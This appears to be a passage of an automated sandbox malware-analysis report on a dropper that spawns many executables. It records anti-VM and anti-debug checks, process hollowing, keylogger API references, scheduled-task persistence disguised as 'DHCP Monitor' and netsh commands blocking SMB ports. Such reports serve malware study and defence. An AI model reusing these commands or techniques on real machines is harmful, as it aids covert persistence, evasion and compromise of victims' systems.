                    Source: C:\Users\user\AppData\Roaming\aaa.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exeAPI call chain: ExitProcess graph end nodegraph_7-1748
                    Source: test.exe, 00000006.00000000.397644420.0000000000DA2000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: vmware
                    Source: 4.exe, 00000010.00000002.549082146.0000000005A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oy
                    Source: test.exe, 00000006.00000002.703368085.0000000001410000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
                    Source: healastounding.exeBinary or memory string: \VMWare\
                    Source: 8f1c8b40c7be588389a8d382040b23bb.exe, 0000000E.00000000.431135181.00000000004BD000.00000020.00000001.01000000.0000000D.sdmpBinary or memory string: \VMWare\F\oracle\virtualbox guest additions\
                    Source: 4.exe, 00000010.00000002.549082146.0000000005A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: Opus.exe, 00000009.00000002.702218807.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, mediaget.exe, 00000011.00000003.496866786.0000000001375000.00000004.00000020.00020000.00000000.sdmp, mediaget.exe, 00000011.00000003.497883150.0000000001375000.00000004.00000020.00020000.00000000.sdmp, mediaget.exe, 00000011.00000003.628943964.0000000001375000.00000004.00000020.00020000.00000000.sdmp, mediaget.exe, 00000011.00000003.641573561.0000000001374000.00000004.00000020.00020000.00000000.sdmp, mediaget.exe, 00000011.00000003.499366565.0000000001375000.00000004.00000020.00020000.00000000.sdmp, mediaget.exe, 00000011.00000003.536070108.0000000001375000.00000004.00000020.00020000.00000000.sdmp, mediaget.exe, 00000011.00000003.518432103.0000000001375000.00000004.00000020.00020000.00000000.sdmp, mediaget.exe, 00000011.00000003.645223386.0000000001374000.00000004.00000020.00020000.00000000.sdmp, mediaget.exe, 00000011.00000003.501699554.0000000001375000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: aaa.exe, 0000000C.00000002.458844469.0000000002915000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware svga ii3vm additions s3 trio32/64
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\AppData\Roaming\test.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exeCode function: 7_2_00416480 LoadLibraryA,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,7_2_00416480
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exeCode function: 7_2_0040EE60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0040EE60
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exeCode function: 7_2_0040EE60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0040EE60
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exeCode function: 7_2_00404770 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00404770
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exeCode function: 7_2_0041A780 _memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_0041A780

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\AppData\Roaming\aaa.exeMemory written: C:\Users\user\AppData\Roaming\aaa.exe base: 3E0000 value starts with: 4D5A
                    Sample uses process hollowing technique
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeSection unmapped: unknown base address: 400000
                    .NET source code references suspicious native API functions
                    Source: Pluto Panel.exe.0.dr, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: Pluto Panel.exe.0.dr, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: gay.exe.4.dr, OK.csReference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
                    Source: gay.exe.4.dr, kl.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32'), ('MapVirtualKey', 'MapVirtualKey@user32.dll')
                    Source: Opus.exe.4.dr, u0023u003dqjryTBW16mUfo_ItH9KWoGQu003du003d.csReference to suspicious API methods: ('#=qxG$Aklpbf6gyBfAqTMmORA==', 'OpenProcess@kernel32.dll'), ('#=qh7diH14jww3Fm9rMJ_jIfQ==', 'FindResourceEx@kernel32.dll')
                    Source: 5.0.Pluto Panel.exe.f10000.8.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 5.0.Pluto Panel.exe.f10000.8.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 5.2.Pluto Panel.exe.f10000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 5.2.Pluto Panel.exe.f10000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 5.0.Pluto Panel.exe.f10000.4.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 5.0.Pluto Panel.exe.f10000.4.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 5.0.Pluto Panel.exe.f10000.12.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 5.0.Pluto Panel.exe.f10000.12.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess created: C:\Users\user\AppData\Roaming\healastounding.exe "C:\Users\user\AppData\Roaming\healastounding.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess created: C:\Users\user\AppData\Roaming\Pluto Panel.exe "C:\Users\user\AppData\Roaming\Pluto Panel.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess created: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe "C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess created: C:\Users\user\AppData\Roaming\22.exe "C:\Users\user\AppData\Roaming\22.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess created: C:\Users\user\AppData\Roaming\___11.19.exe "C:\Users\user\AppData\Roaming\___11.19.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess created: C:\Users\user\AppData\Roaming\test.exe "C:\Users\user\AppData\Roaming\test.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess created: C:\Users\user\AppData\Roaming\gay.exe "C:\Users\user\AppData\Roaming\gay.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess created: C:\Users\user\AppData\Roaming\Opus.exe "C:\Users\user\AppData\Roaming\Opus.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess created: C:\Users\user\AppData\Roaming\aaa.exe "C:\Users\user\AppData\Roaming\aaa.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess created: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe "C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess created: C:\Users\user\AppData\Roaming\4.exe "C:\Users\user\AppData\Roaming\4.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess created: C:\Users\user\AppData\Roaming\a.exe "C:\Users\user\AppData\Roaming\a.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exeProcess created: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe "C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess created: C:\Users\user\AppData\Roaming\mediaget.exe "C:\Users\user\AppData\Roaming\mediaget.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp4896.tmpJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp5D87.tmpJump to behavior
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add policy name=Block
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filterlist name=Filter1
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess created: C:\Users\user\AppData\Roaming\aaa.exe C:\Users\user\AppData\Roaming\aaa.exe
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeProcess created: C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe "C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe"
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeProcess created: C:\Users\user\AppData\Local\Temp\Dcvxaamev.exe "C:\Users\user\AppData\Local\Temp\Dcvxaamev.exe"
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Roaming\4.exeProcess created: C:\Users\user\AppData\Roaming\3.exe "C:\Users\user\AppData\Roaming\3.exe"
                    Source: mediaget.exe, 00000011.00000002.705065903.0000000003315000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: program managerH
                    Source: Opus.exe, 00000009.00000002.706154944.000000000307A000.00000004.00000800.00020000.00000000.sdmp, Opus.exe, 00000009.00000002.706141297.0000000003078000.00000004.00000800.00020000.00000000.sdmp, Opus.exe, 00000009.00000002.702218807.0000000000F66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: mediaget.exe, 00000011.00000002.705065903.0000000003315000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: program manager.
                    Source: mediaget.exe, 00000011.00000002.704209643.00000000032B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: program manager
                    Source: mediaget.exe, 00000011.00000003.646152049.0000000001338000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RhProgram Manager$
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
